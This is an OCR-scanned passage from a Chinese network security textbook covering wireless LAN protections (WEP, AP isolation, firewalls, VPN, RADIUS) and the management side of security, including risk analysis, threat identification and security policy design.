播 。 这 个 功能 开始 主要 是 为 那些 客户 端 流 动量 比较 大 的 无 线 网 络 而 设计 的 。 如 果 是 启动 了 
SSID 广播 的 网 络 ， 其 路 由 设备 会 自动 向 该 设备 有 效 履 盖 范 围 内 的 客户 端 广播 自己 的 SSD 
标识 符 ， 客 户 端 接收 到 这 个 SSID 标识 符 后 ， 利 用 这 个 SSID 标识 符 就 可 以 使 用 这 个 网 络 。 
这 个 功能 虽然 很 方便 ， 但 同时 ， 这 个 功能 也 存在 极 大 的 安全 隐患 ， 它 犹如 自动 地 为 想 接 入 
此 无 线 网 络 的 黑客 敞开 了 大 门 。 对 于 家 庭 用 户 来 讲 ， 网 络 成 员 相对 固定 ， 所 以 最 好 禁止 这 
项 功能 。 但 在 企业 或 商业 网 络 里 ， 为 了 满足 经 常 流动 的 无 线 网 络 客户 端 ， 必 定 要 牺牲 安全 
性 来 启用 这 项 功能 。 

7. 使 用 WEP 加 密 


WEP 是 英文 Wired Equivalent Privacy 的 简称 ， 中 文 含义 是 “有 线 等 效 加 密 ”， 所 有 经 
过 WIFI 认证 的 设备 都 支持 该 安全 协议 。 采 用 64 位 或 128 位 加 密 密 钥 的 RC4 加 密 算法 , 它 
可 以 保证 传输 数据 在 无 线 网 络 间 不 会 以 明文 方式 被 截获 。 此 方法 需要 在 每 个 AP 和 无 线 设 
备 上 设置 密码 ， 部 署 相 对 比较 麻烦 。 它 使 用 静态 非 交换 式 密 钥 ， 安 全 性 也 受到 了 一 定 的 质 
疑 ， 不 过 仍然 可 以 阻挡 简单 的 数据 截获 攻击 ， 通 常 可 以 应 用 到 家 庭 和 中 小 型 企业 的 安全 加 
密 。 若 只 单独 使 用 此 措施 ， 不 结合 使 用 AP 隔离 的 话 ， 在 一 些 公共 的 场所 就 不 太 适合 。 


8. AP 隔离 


AP 隔离 非常 类 似 有 线 网 络 的 VLAN( 虚 拟 局 域 网 )， 将 所 有 的 无 线 客户 端 设 备 之 问 完全 
隔离 ， 使 客户 端 只 能 访问 AP 接 入 的 固定 网 络 。 该 措施 非常 适合 大 型 的 会 议 室 、 酒 店 、 机 
场 等 公共 场所 的 无 线 网 络 建设 ， 让 各 个 接 入 的 无 线 客户 端 之 间 相 互 保持 隔离 ， 提 供 彼 此 间 
更 加 安全 的 接 入 。 该 措施 对 于 家 庭 用 户 来 说 没有 太 多 的 实际 意义 ， 但 企业 用 户 在 一 些 特殊 
的 场合 可 以 采用 这 种 方式 来 加 强 无 线 网 络 的 安全 性 。 例 如 有 客户 或 外 单位 人 员 参 加 的 会 议 
等 公共 活动 。 
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9.3.2 第 三 方 安全 方法 

1. 通过 防火 墙 解决 安全 问题 

由 于 多 家 厂商 开发 防火 墙 ， 这 里 只 介绍 其 中 一 款 。 

SOHO TZW 整合 无 线 安全 、 防 火 墙 及 虚拟 私人 网 络 (VPN) 技 术 成 为 一 独特 且 简 单 易 实 
现 的 解决 方案 , 提供 中 小 企业 网 络 (SME) 无 线 传输 的 方便 性 及 高 效 性 ,并 以 IPSec 加 密 协 议 
在 无 线 局 域 网 络 产 生 VPN 信道 强化 使 用 安全 。SOHO TZW 并 不 仅仅 只 保护 宽带 上 网 ， 连 
无 线 上 网 也 是 坚不可摧 的 ， 连 最 难 缠 的 黑客 也 被 挡 在 门 外 。 

因为 内 建 的 无 线 访客 服务 功能 (WGS) 的 存在 ， 网 络 管理 者 才 得 以 灵活 地 规划 多 个 信任 
存 取 区 域 ， 为 有 线 及 无 线 工作 者 以 及 无 线 访客 使 用 者 提供 不 与 网 络 安全 妥协 的 前 所 未 有 
安 控 等 级 。 

SOHO TZW 的 核心 是 SonicOS， 这 是 SonicWALL 新 创 的 下 一 代 操 作 系统 ， 使 得 设 
有 线 无 线 整 合 的 网 络 既 简单 又 容易 ， 不 管 是 在 中 心 办 公 室 、 远 地 办 公 室 或 访客 上 网 
(Chotspob， 增 设 无 线 安 全 存 取 都 不 再 是 负担 。 

SOHO TZW 的 主要 功能 及 效益 如 下 。 

(1) 整合 防火 墙 ,VPN 及 无 线 存 取 技 术 。 SonicWALL SOHO TZW 整合 了 安全 防火 墙 、 
VPN 及 无 线 存 取 技 术 ， 成 为 一 种 独特 且 简 单 易 用 的 解决 方案 ,减轻 了 多 种 方案 并 行使 用 在 
时 间 及 费用 上 的 沉重 负担 。 

(2) 将 IPSec 加 密 协议 运用 在 无 线 网 络 。 以 IPSec 3DES 加 密 协 议 强 化 无 线 局 域 网 络 传 
输 ，SOHO TZW 提供 坚不可摧 的 无 线 网 络 安全 ,解决 网 络 管理 者 的 安全 顾忌 与 使 用 者 要 求 
无 线 网 络 联机 服务 之 间 的 冲突 。 

(3) 无 线 访 客服 务 功能 (WGS)。 这 项 内 建功 能 提供 前 所 未 有 的 安 控 等 级 ， 网 络 管理 者 
得 以 灵活 地 为 有 线 及 无 线 工 作者 以 及 无 线 访客 使 用 者 规划 多 个 信任 存 取 区 域 ， 并 且 不 与 网 

(4) 弹性 的 连接 能 力 。SonicWALL SOHO TZW 支持 桌 上 型 计算 机 、 膝 上 型 计算 机 、 
平板 计算 机 安全 的 无 线 存 取 企 业 网 络 。 

(5) 简单 易 用 的 网 页 管理 接口 。SonicWALL SOHO TZW 新 创 的 网 页 接口 遂行 完整 的 
无 线 网 络 、VPN、 防 火 堵 政策 部 署 精 灵 ， 使 得 设 定 有 线 无 线 整合 的 网 络 既 简 单 又 容易 。 
(6) 802.11b 无 线 网 络 支持 。SonicWALL SOHO TZW 支持 业界 标准 的 802.11b 无 线 
局 域 网 络 技术 。 

另外 ，Fortinet 适合 大 型 企业 和 服务 提供 商 的 系列 产品 包括 FortiGate-4000 、 
FortiGate-3000 和 FortiGate-3600 病毒 防火 墙 , 它们 是 运营 商 级 的 安全 控制 产品 , 为 大 型 企 
业 和 服务 供应 商 提供 易于 管理 的 高 性 能 网 络 安全 服务 。 使 用 多 个 CPU 和 硬件 加 速 ， 它 们 都 
配备 有 宛 余 电源 保护 ， 以 减少 单 点 失败 ， 同 时 提供 负载 平衡 及 错误 恢复 功能 ， 确 保 避 免 服 
务 中 断 现 象 。 其 大 容量 、 高 稳定 性 、 以 及 便捷 管理 ， 使 它们 成 为 服务 供应 商 的 最 佳 选择 。 


2. 通过 VPN 增强 无 线 网 络 安全 
虽然 防火 墙 可 以 独当一面 ， 但 目前 VPN 对 企业 无 线 网 络 安 全 还 起 着 非常 重要 的 作用 。 


号 


风 队 


由 ET 


所 谓 VPN( 虚 拟 专 用 网 络 ) 就 是 指 在 一 个 公共 卫 网 络 平台 上 通过 隧道 以 及 加 密 技术 保证 
专用 数据 的 网 络 安全 。 它 不 属于 802.11 标准 定义 ， 是 以 另外 一 种 强大 的 加 密 方法 来 保证 传 
输 安 全 的 技术 ， 可 以 和 其 他 的 无 线 安 全 技术 一 起 使 用 。VPN 协议 包括 两 层 的 PPTP/L2TP 
协议 和 三 层 的 了 PSec 协议 , IPSec 用 于 保护 卫 数据 包 或 上 层 数据 ，IPSec 采用 诸如 数据 加 密 
标准 (DES) 和 168 位 三 重 数据 加 密 标准 (3DES) 以 及 其 他 数据 包 的 权限 鉴别 算法 来 进行 数据 
加 密 ， 并 使 用 数字 证 书 来 验证 公 钥 ，VPN 在 客户 端 与 各 级 组 织 之 间架 起 一 条 动态 加 密 的 隧 
道 ， 并 支持 用 户 身份 验证 ， 实 现 高 级 别 的 安全 。VPN 支持 中 央 安 全 管理 ， 不 足 之 处 是 需要 
在 客户 机 中 进行 数据 的 加 密 和 解密 ， 增 加 了 系统 的 负担 ， 另 外 要 求 在 AP 后 面 配备 VPN 集 
中 器 ， 从 而 提高 了 成 本 。 无 线 局 域 网 的 数据 用 VPN 技术 加 密 后 再 用 无 线 加 密 技 术 加 密 ， 就 
好 像 双 重 门 锁 ， 提 高 了 可 靠 性 。 

针对 不 同 的 用 户 要求 ，VPN 有 三 种 解决 方案 : 远程 访问 虚拟 网 (Access VPN)、 企 业内 
部 虚拟 网 Intranet VPN) 和 企业 扩展 虚拟 网 (Extranet VPN)。 这 三 种 类 型 的 VPN 分 别 与 传统 
的 远程 访问 网 络 、 企 业内 部 的 Intranet 以 及 企业 网 和 相关 合作 伙伴 的 企业 网 所 构成 的 
Extranet( 外 部 扩展 ) 相 对 应 。 

面 对 来 者 不 善 的 网 络 入 侵 或 者 黑客 ， 禁 止 未 经 授权 的 使 用 服务 是 最 简单 有 效 的 方法 ， 
这 时 候 VPN 的 功能 就 凸显 出 来 了 。 好 的 防御 方法 就 是 阻止 未 被 认证 的 用 户 进入 网 络 , 由 于 
访问 特权 是 基于 用 户 身份 的 ， 所 以 通过 加 密 办 法 对 认证 过 程 进行 加 密 是 进行 认证 的 前 提 ， 
通过 VPN 技术 能 够 有 效 地 保护 通过 电波 传输 的 网 络 。 一 旦 网 络 成 功 配置 ,严格 的 认证 方式 
和 认证 策略 将 是 至 关 重 要 的 。 另 外 ， 还 需要 定期 对 无 线 网 络 进行 测试 ， 以 确保 网 络 设备 使 
用 了 安全 认证 机 制 ， 并 确保 网 络 设备 的 配置 正常 。 

由 于 VPN 是 以 公共 网 络 为 载体 ， 即 以 较 低 的 价格 可 实现 专用 线路 的 安全 性 、 可 用 性 。 
在 访问 控制 、 数 据 机 密 性 、 完 整 性 和 数据 源 的 认证 上 ，VPN 是 网 络 得 力 的 助手 。 

3. 基于 RADIUS 的 无 线 接 入 认证 

RADIUS 远程 认证 拨 入 用 户 协议 是 在 认证 过 程 中 提供 认证 信息 的 安全 方法 ， 无 线 终端 
和 RADIUS 服务 器 在 有 限 局 域 网 上 通过 接 入 点 进行 双向 认证 。 企 业 不 需要 管理 每 个 无 线 接 
入 点 内 部 的 MAC 地 址 表 或 用 户 ， 通 过 在 RADIUS 系统 内 设置 单一 数据 库 ， 就 可 以 简化 管 
理 ， 又 能 提供 一 种 更 有 效 的 可 扩展 集中 认证 机 制 。 接 入 点 的 作用 如 同一 个 RADIUS 用 户 ， 
它 可 以 收集 用 户 认证 信息 并 把 这 些 信息 传递 到 制定 的 RADIUS 服务 器 上 。RADIUS 服务 器 
接收 用 户 的 各 种 连接 请 求 ， 进 行 用 户 鉴别 ， 对 接 入 点 作出 响应 ， 向 用 户 提供 服务 所 必需 的 
信息 。 接 入 点 对 RADIUS 服务 器 的 回复 相应 起 作用 ， 许 可 或 拒绝 网 络 接 入 。 扩 展 认 证 协议 
(EAP) 是 RADIUS 的 扩展 ， 可 以 使 无 线 客户 端 适配器 与 RADIUS 服务 器 通信 。 
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10.1 网 络 安全 管理 的 意义 


随 着 网 络 规模 的 不 断 扩 大 ， 越 来 越 多 的 系统 加 入 到 其 中 ， 各 个 系统 的 安全 性 及 管理 方 
式 各 不 相同 ， 这 就 增加 了 网 络 安全 管理 的 复杂 度 和 难度 。 更 糟糕 的 是 ， 人 们 并 没有 清醒 地 
意识 到 网 络 安全 管理 的 重要 性 ， 目 前 大 多 数 信息 系统 缺少 安全 管理 员 ， 缺 少 安全 管理 技术 
规范 ， 缺 少 定 期 的 系统 安全 测试 ， 缺 少 安全 审计 机 制 。 这 些 疏 于 管理 的 网 络 成 为 黑客 们 游 
荡 的 乐园 。 

通常 安全 管理 涉及 两 个 方面 : 一 个 是 安全 管理 ， 即 防止 未 授权 者 访问 网 络 ， 另 一 个 是 
管理 的 安全 性 ， 即 防止 未 授权 者 访问 网 络 管理 系统 。 

网 络 安全 管理 方面 的 问题 主要 包括 : 网 络 管理 员 配置 不 当 或 网 络 应 用 升级 不 及 时 造成 
的 安全 漏洞 、 使 用 脆弱 的 用 户口 令 、 随 意 使 用 普通 网 络 站 点 下 载 的 软件 、 在 防火 墙 内 部 架 
设 拨号 服务 器 却 没 有 对 帐号 的 认证 严格 限制 、 用 户 安全 意识 不 强 将 自己 的 帐号 随意 转借 他 
人 或 与 别人 共享 等 。 

解决 网 络 安全 问题 ， 人 为 的 因素 是 不 可 忽视 的 。 多 数 的 安全 事件 是 由 于 人 员 政 忽 或 者 
黑客 主动 攻击 植 入 恶意 程序 造成 的 。 人 员 的 玻 忽 往往 是 造成 安全 漏洞 的 直接 原因 ， 因 此 更 
难以 防御 ， 和 危害 性 也 更 大 。 

人 员 造 成 的 安全 问题 主要 有 三 个 方面 。 

。 ”网 络 及 系统 管理 员 对 系统 配置 及 安全 缺乏 清醒 的 认识 或 整体 的 考虑 ， 造 成 系统 安 

全 性 差 ; 

。 ”程序 员 开 发 的 软件 有 安全 缺陷 ， 比 如 常见 的 缓冲 区 溢出 问题 

e。 ”用 户 没 有 保护 好 自己 的 口令 及 密 钥 。 

这 些 问 题 都 会 使 网 络 处 于 危险 之 中 ， 而 且 是 无 论 多 么 精妙 的 安全 策略 和 网 络 安全 体系 
都 不 能 解决 的 。 


10.2 风险 分 析 与 安全 需求 


在 规划 和 建设 网 络 时 ， 应 把 网 络 安全 作为 建设 目标 之 一 ， 认 真 进行 分 析 与 规划 ， 对 可 
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能 面 对 的 网 络 安全 风险 、 网 络 安全 需求 、 应 达到 的 安全 级 别 等 ， 制 定 合理 的 安全 策略 ， 实 
施 必要 的 安全 措施 。 

实现 网 络 安全 并 不 是 一 劳 永 逸 ， 网 络 在 运行 过 程 中 受 许多 动态 因素 的 影响 ， 安 全 威胁 
是 不 断 发 生 和 变化 的 ， 这 决定 了 网 络 安全 的 管理 是 一 个 不 断 重复 的 过 程 。 在 此 过 程 中 ， 要 
经 常 对 网 络 的 安全 状况 进行 审计 和 评估 ， 改 变 不 合理 的 配置 ， 检 查 安全 漏洞 ， 增 加 新 的 安 
全 措施 ， 抵 御 新 的 攻击 方式 ， 以 保证 网 络 的 正常 运行 。 

在 安全 领域 内 有 一 个 基本 的 原则 ， 那 就 是 防止 威胁 发 生 的 费用 一 定 要 小 于 威胁 发 生 后 
进行 补救 的 费用 ， 否 则 投资 就 是 不 经 济 、 不 合理 的 。 

制定 网 络 安全 策略 ， 以 确保 我 们 在 保障 安全 上 付出 的 努力 和 投资 会 得 到 应 有 的 收益 。 
道理 虽然 显而易见 ， 但 实施 起 来 却 并 不 容易 ， 常 会 出 现 的 情况 是 : 花 了 大 量 时 间 和 精力 ， 
耗费 了 大 笔 的 金钱 ， 制 定 和 实施 的 安全 措施 并 没有 起 到 预期 的 作用 。 因 而 在 构建 一 个 安全 
网 络 时 ， 首 先 要 做 的 就 是 对 系统 进行 准确 的 风险 分 析 ， 确 定 系统 的 安全 需求 ， 明 确 系统 哪 
些 部 分 容易 成 为 攻击 目标 等 。 

制订 一 个 安全 计划 ， 可 遵循 以 下 步骤 : 

(1) 确定 保护 什么 。 

(2) 考虑 防止 它 会 被 怎么 样 。 

(3) 威胁 发 生 的 可 能 性 。 

(4) 实施 最 经 济 有 效 的 保护 措施 。 

(5) 不 断 重 复 以 上 过 程 ， 不 断 完善 安全 计划 。 

- 份 详尽 的 计划 书 ， 无 论 对 于 当前 安全 计划 的 实现 还 是 对 于 安全 系统 未 来 的 维护 都 是 
至 关 重 要 的 。 一 个 完整 的 安全 计划 书 应 包括 以 下 内 容 。 

(1) 总 则 : 说 明 系 统 设计 的 总 体 思路 、 系 统 主要 完成 的 任务 及 主要 作用 等 。 

(2) 网 络 系统 状况 分 析 : 分 析 网 络 的 组 成 、 结 构 及 连接 状态 等 。 如 基本 设备 情况 、 网 
络 划分 情况 、 与 mternet 连接 的 状况 等 。 分 析 网 络 的 服务 及 应 用 的 类 型 ， 分 析 网 络 的 特点 。 

(3) 网 络 系统 安全 风险 分 析 : 从 网 络 的 物理 安全 性 、 网 络 平台 的 安全 性 、 系 统 的 安全 
性 、 应 用 安全 性 、 管 理 安全 性 等 几 个 方面 对 企业 局 域 网 络 可 能 面临 的 安全 风险 进行 分 析 。 

(4) 安全 需求 分 析 与 安全 策略 的 制定 : 描述 系统 的 安全 需求 与 安全 目标 ， 如 哪些 服务 
器 需要 安全 保护 、 哪 些 重要 网 段 需 要 额外 的 保护 措施 、 哪 些 资源 需要 加 强 访问 控制 和 管理 
安全 等 。 通 过 分 析 ， 明 确 安全 需求 和 安全 目标 ， 制 定 正确 严密 的 网 络 安全 策略 。 

(5) 网 络 安全 方案 总 体 设计 : 确定 网 络 系统 安全 方案 设计 、 规 划 时 应 遵循 的 原则 ， 确 
定安 全 方案 所 使 用 的 安全 机 制 及 安全 服务 。 

(6) 网 络 安全 体系 结构 设计 : 通过 对 网 络 的 全 面 了 解 ， 按 照 安全 策略 的 要 求 、 风 险 分 
析 的 结果 及 整个 网 络 的 安全 目标 ， 设 计 和 建立 整个 网 络 的 安全 体系 。 有 具体 的 安全 控制 系统 
由 以 下 几 个 方面 组 成 ， 分 别 是 物理 安全 、 网 络 安全 、 系 统 安 全 、 信 息 安 全 、 应 用 安全 和 安 
全 管理 。 

(7) 安全 系统 的 配置 及 实现 : 根据 以 上 的 分 析 和 设计 ， 选 择 适 当 的 安全 组 件 和 安全 产 
品 ， 注 意 不 同 的 安全 组 件 之 间 功 能 的 协调 和 优势 的 互补 ， 形 成 一 个 完整 、 健 壮 的 安全 体系 。 
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10.2.1 系统 风险 分 析 


风险 分 析 包 括 决定 保护 什么 、 需 要 防止 什么 和 怎么 保护 ， 这 是 调查 风险 的 过 程 ， 随 后 
还 要 把 它们 按照 安全 的 级 别 排序 。 
风险 分 析 包括 两 个 方面 : 确定 资产 和 确定 威胁 。 


1. 确定 资产 


风险 分 析 中 的 第 一 步 是 确定 所 有 需要 保护 的 东西 。 有 些 是 很 明显 的 ， 比 如 有 价值 的 私 
人 信息 、 知 识 产 权 和 各 种 各 样 的 硬件 设备 。 而 有 些 则 常 被 忽视 ， 如 真正 使 用 系统 的 人 。 根 
据 Pfleeger 建议 ， 可 以 使 用 一 个 列表 列 出 所 有 可 能 被 安全 问题 影响 的 东西 。 

(1) 硬件 : 计算 机 (服务 器 、 工 作 站 、 个 人 电脑 等 )、 打 印 机 、 存 储 设备 (磁盘 、 磁 带 机 )、 
通信 线路 、 终 端 服 务 器 、 路 由 器 。 

(2) 软件 ， 应 用 程序 、 诊 断 程 序 、 操 作 系 统 、 通 讯 系 统 。 

(3) 数据 在 使 用 中 以 及 在 线 存储 的 文档 、 备 份 、 日 志 、 数 据 库 及 在 通信 媒体 中 传输 
的 数据 。 

(4) 人 : 用 户 、 管 理 员 、 软 硬件 维护 人 员 。 

(5) 文件 : 在 程序 、 硬 件 、 系 统 、 本 地 管理 中 使 用 的 文件 。 

(6) 物资 : 纸张 、 表 格 、 磁 介质 等 。 


2. 确定 威胁 


随 着 Intemet 的 急剧 发 展 和 上 网 用 户 的 迅速 增加 ， 风 险 问题 变 得 更 加 严重 和 复杂 。 

由 于 缺乏 安全 控制 机 制 和 对 Intemet 安全 政策 的 认识 不 足 , 这 些 风险 问题 正 日 益 变 得 严重 。 

网 络 安全 风险 可 以 从 以 下 两 个 方面 来 理解 。 一 是 系统 本 身 的 安全 风险 ， 如 网 络 的 物理 
安全 、 网 络 平台 的 安全 、 系 统 的 安全 、 应 用 的 安全 、 管 理 的 安全 ， 二 是 来 自 系统 外 部 的 安 
全 风险 ， 如 黑客 、 恶 意 代码 。 其 中 外 部 的 安全 风险 是 通过 在 系统 本 身 的 安全 风险 中 找到 突 
破 口 而 发 生 的 。 下 面 将 从 这 些 方面 具体 分 析 网 络 可 能 面临 的 安全 风险 。 

(1) 物理 安全 风险 。 网络 的 物理 安全 风险 是 多 种 多 样 的 。 网 络 的 物理 安全 主要 是 地 震 、 
水 灾 、 火 灾 等 环境 事故 ， 电 源 故障 ， 人 为 操作 的 失误 或 错误 ， 设 备 被 盗 、 被 毁 ， 电 磁 干 扰 ， 
线路 截获 ， 硬 件 、 机 房 环境 及 报警 系统 的 设计 ， 安 全 意识 等 。 它 是 整个 网 络 系统 安全 的 前 提 。 

(2) 网 络 平台 的 安全 风险 。 网 络 结构 的 安全 涉及 网 络 拓扑 结构 、 网 络 路 由 状况 及 网 络 
的 环境 等 。 

(3) 系统 的 安全 风险 。 系 统 的 安全 是 指 网 络 操作 系统 、 网 络 硬件 平台 是 否 可 靠 和 值得 
信任 。 无 论 是 Microsoft 的 Windows NT 或 者 其 他 任何 商用 UNIX 操作 系统 ， 其 开发 厂商 很 
可 能 留 有 “后 门 ”， 并 且 安 全 漏洞 也 在 不 断 地 被 发 现 。 虽 然 说 没有 绝对 安全 的 操作 系统 ， 
但 是 ， 可 以 通过 对 现 有 的 操作 平台 进行 安全 配置 、 对 操作 和 访问 权限 进行 严格 控制 ， 加 强 
登录 过 程 的 认证 (特别 是 在 到 达 服 务 器 主机 之 前 的 认证 )， 确 保 用 户 的 合法 性 ， 提 高 系统 的 
安全 性 。 

(4) 应 用 的 安全 风险 。 应 用 系统 的 安全 跟 具 体 的 应 用 有 关 ， 它 涉及 很 多 方面 。 应 用 系 
统 是 不 断 发 展 的 ， 且 应 用 类 型 是 不 断 增加 的 ， 其 安全 漏洞 也 是 不 断 增加 且 隐 藏 得 越 来 越 深 。 
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因此 ， 一 套 详 尽 的 测试 软件 是 必需 的 。 应 用 的 安全 性 涉及 信息 、 数 据 的 安全 性 ， 如 机 密 信 
息 泄 露 、 未 经 授权 的 访问 、 破 坏 信息 完整 性 、 假 冒 、 破 坏 系统 的 可 用 性 等 。 应 用 系统 的 安 
全 是 动态 的 、 不 断 变化 的 。 保 证 应 用 系统 的 安全 也 是 一 个 随 网 络 发 展 不 断 完善 的 过 程 。 

(5) 管理 的 安全 风险 。 管 理 是 网 络 安全 中 最 重要 的 部 分 。 责 权 不 明 ， 管 理 混乱 、 安 全 
管理 制度 不 健全 及 缺乏 可 操作 性 等 都 可 能 引起 安全 管理 的 风险 。 当 网 络 出 现 攻 击 行为 或 网 
络 受到 其 他 一 些 安全 威胁 时 (如 内 部 人 员 的 违规 操作 等 )， 无 法 进行 实时 的 检测 、 监 控 、 报 
告 与 预警 ， 这 就 要 求 我 们 必须 对 站 点 的 访问 活动 进行 多 层次 的 记录 ， 及 时 发 现 非法 入 侵 行 
为 。 建 立 安全 机 制 ， 必 须 深刻 理解 网 络 并 提供 直接 的 解决 方案 。 

(6) Hacker 攻击 。Hacker 会 利用 系统 和 管理 上 的 一 切 能 够 利用 的 漏洞 。 我 们 可 以 综合 
采用 防火 墙 技术 、Web 页 面 保护 技术 、 入 侵 检测 技术 、 安 全 评估 技术 来 保护 网 络 内 的 信息 
资源 ， 防 止 Hacker 攻击 。 

(7) 恶意 代码 。 计 算 机 病毒 是 一 种 典型 的 恶意 代码 ， 它 一 直 是 计算 机 安全 的 主要 威胁 。 
恶意 代码 不 仅仅 限于 病毒 ， 还 包括 蠕虫 、 特 洛 伊 森马、 逻辑 炸弹 和 其 他 未 经 许可 的 软件 。 

(8) 不 满 的 内 部 员工 。 与 外 来 的 入 侵 者 相 比 ， 他 们 更 熟悉 服务 器 、 小 程序 、 脚 本 和 系 
统 的 弱点 。 对 于 已 经 离职 的 不 满员 工 ， 他 们 可 以 传 出 至 关 重 要 的 信息 、 泄 露 安全 重要 信息 、 
错误 地 进入 数据 库 、 删 除数 据 等 。 可 以 通过 定期 改变 口令 和 删除 系统 记录 以 减少 这 类 风险 。 


10.2.2 网络 的 安全 需 3 


对 于 一 般 的 网 络 ， 主 要 的 安全 需求 集中 在 对 服务 器 的 安全 保护 、 防 Hacker 和 病毒 、 重 
要 网 段 的 保护 以 及 管理 安全 上 。 因 此 ， 必 须 采 取 相 应 的 安全 措施 杜绝 安全 隐患 ， 应 该 做 到 
以 下 几 个 方面 。 

(1) 公开 服务 器 的 安全 保护 。 

(2) 防止 Hacker 从 外 部 攻击 。 

(3) 入 侵 检测 与 监控 。 

(4) 信息 审计 与 记录 。 

(5) 病毒 防护 。 

(6) 数据 安全 保护 。 

(7) 数据 备份 与 恢复 。 

(8) 网 络 的 安全 管理 。 


10.3 安全 管理 策略 


安全 管理 涉及 两 方面 : 一 是 安全 管理 ， 即 防止 未 授权 访问 网 络 ， 另 一 个 是 管理 的 安全 
性 ， 即 防止 未 授权 者 访问 网 络 管理 系统 。 

安全 策略 是 整个 安全 系统 的 基石 ， 它 定义 了 网 络 运作 和 管理 的 基本 规则 ,是 网 络 系统 、 
应 用 软件 、 员 工 甚至 是 访问 者 都 能 遵循 的 一 整套 协议 。 安 全 策略 的 制定 是 一 项 巨大 的 工程 ， 
对 于 许多 的 技术 细节 及 一 切 可 能 发 生 的 情况 都 要 考虑 和 处 理 ， 但 只 要 对 网 络 做 好 风险 分 析 
和 评估 ,对 安全 现状 和 安全 技术 有 足够 的 了 解 ， 制定 的 安全 策略 将 是 一 个 回报 很 高 的 工作 。 
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安全 策略 是 一 个 “ 活 文档 ”， 随 着 新 教训 的 获得 和 企业 的 不 断 发 展 ， 安 全 策略 不 断 地 

校正 和 修改 。 安 全 策略 又 是 配置 安全 工具 的 “指南 ”， 一 些 技术 工具 ， 如 防火 墙 、 入 侵 检 
测 系统 的 建立 、 实 现 和 配置 方案 ， 都 应 该 体现 安全 策略 。 它 们 只 需 简单 地 执行 策略 确立 的 
规则 并 禁止 被 策略 视 为 不 合适 的 行为 。 安 全 策略 是 建立 有 效 的 安全 防护 体系 的 方法 ， 也 为 
网 络 用 户 深入 地 理解 和 使 用 系统 安全 功能 提供 了 有 益 的 帮助 , 确保 系统 的 安全 性 及 可 用 性 ， 
从 而 达到 设计 的 预期 目标 。 
在 网 络 规划 和 设计 之 初 就 进行 安全 策略 的 制定 是 十 分 必要 的 。 安 全 策略 建立 起 来 以 后 ， 
可 以 对 网 络 的 拓扑 结构 、 子 网 划分 、 传 输 介 质 选 择 、 系 统 及 应 用 软件 的 选择 、 信 息 资源 如 
何 部 署 、 应 用 程序 开发 等 提供 准则 ， 从 而 使 系统 的 安全 性 从 整体 上 得 到 提升 。 

安全 政策 规定 做 什么 (What)， 而 不 去 规定 如 何 去 做 (How)， 因 此 它 不 是 一 个 操作 规范 。 


10.3.1 制定 安全 策略 的 原则 
1 安全 策略 设计 的 依据 


设计 网 络 安全 系统 的 一 个 首要 任务 就 是 确认 该 网 络 的 安全 需求 和 目标 ， 并 制定 安全 策略 。 

安全 策略 应 该 反映 本 地 网 络 同 外 部 网 络 连接 的 理由 ， 并 规定 网 络 对 内 部 用 户 及 外 部 用 
户 分 别提 供 哪些 服务 ， 哪 些 服务 是 完全 开放 的 ， 哪 些 服务 需要 设置 访问 限制 等 。 制 定安 全 
策略 时 ， 首 先 要 明确 最 重要 的 原则 是 采用 “准许 访问 除 明 确 禁 止 以 外 的 所 有 服务 ”， 还 是 
采纳 “禁止 访问 除 明 确 准 许 以 外 的 所 有 服务 ”。 这 对 于 网 络 安全 策略 是 非常 关键 的 一 步 ， 
但 往往 又 容易 被 忽视 。 这 两 个 原则 的 区 别 在 于 : 前 者 对 大 部 分 服务 不 做 控制 ， 可 能 会 有 和 危 
害 安全 的 应 用 服务 被 启用 ， 除 非 管理 员 发 现 问题 并 明确 禁止 ， 此 原则 引发 的 安全 问题 较 突 
出 ; 后 者 由 于 拒绝 除 明 确 准许 以 外 的 所 有 服务 ， 在 没有 得 到 管理 员 鉴 定 准许 之 前 ， 新 的 服 
务 无 法 被 用 户 使 用 ， 灵 活性 稍 差 。 

选择 什么 原则 ， 取 决 于 网 络 安全 性 能 及 服务 性 能 的 要 求 。 

在 做 出 基本 的 决策 之 后 ， 进 一 步 要 做 的 是 决定 哪些 服务 是 向 内 部 用 户 提供 的 ， 哪 些 服 
务 是 向 外 部 的 网 络 用 户 提 供 的 。 如 企业 的 WWW 服务 器 ， 负 责 企业 的 信息 发 布 和 展示 企业 
形象 ， 是 企业 对 外 的 窗口 ， 是 典型 的 提供 给 外 部 网 络 用 户 的 服务 。 企 业内 部 资源 服务 器 ， 
如 各 种 管理 系统 (供应 链 管 理 、 生 产 管理 、 工 资 人 事 管理 ) 等 ， 则 只 向 内 部 用 户 提供 服务 。 
另外 ， 在 安全 策略 中 ， 还 应 包括 监控 安全 的 方式 和 实施 安全 策略 方式 的 说 明 。 
在 设计 安全 策略 和 选择 网 络 安全 系统 时 ， 一 个 总 的 原则 是 : 设计 简单 有 效 的 系统 。 因 
为 安全 系统 越 复杂 ， 越 不 容易 进行 正确 的 配置 ， 维 护 就 越 困难 ， 从 而 引发 安全 问题 。 并 且 ， 
受到 攻击 时 ， 越 容易 受到 破坏 。 另 外 ， 过 于 复杂 的 安全 系统 ， 也 会 影响 网 络 的 使 用 性 能 ， 
降低 对 用 户 请 求 的 响应 速度 等 。 
在 设计 网 络 安全 系统 时 ， 还 需要 考虑 用 户 使 用 安全 系统 的 便利 性 ， 尽 量 提高 安全 系统 
的 透明 性 ， 尽 可 能 减少 由 于 增加 安全 措施 而 给 用 户 带 来 的 不 便 。 用 户 的 接纳 和 满意 对 于 安 
全 系统 的 良好 运作 和 维护 是 至 关 重 要 的 。 

综 上 记述， 在 制定 网 络 安全 策略 时 应 考虑 以 下 因素 。 

(1) 对 于 内 部 用 户 和 外 部 用 户 分 别提 供 哪些 服务 。 

(2) 初始 投资 及 后 续 投 资 。 
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(3) 使 用 的 方便 性 和 服务 效率 。 

(4) 复杂 度 和 安全 性 的 平衡 。 

(5) 网 络 性 能 。 

2. 安全 策略 建立 

制定 安全 策略 的 过 程 就 是 在 系统 风险 分 析 及 安全 需求 分 析 之 后 ， 针 对 系统 可 以 遇 到 的 
威胁 ， 确 定 系统 的 安全 防御 体系 “做 什么 ”的 过 程 。 例 如 ， 针 对 系统 可 能 遇 到 入 侵 行为 
安全 策略 可 以 是 “7x24 小 时 对 网 络 进行 监测 以 防止 入 侵 的 行为 ”, 这 就 是 确定 系统 需要 “做 
什么 ”。 在 制定 策略 的 过 程 中 ， 最 好 不 指定 解决 方案 ， 如 果 策 略 中 规定 选用 某 公司 的 某 型 
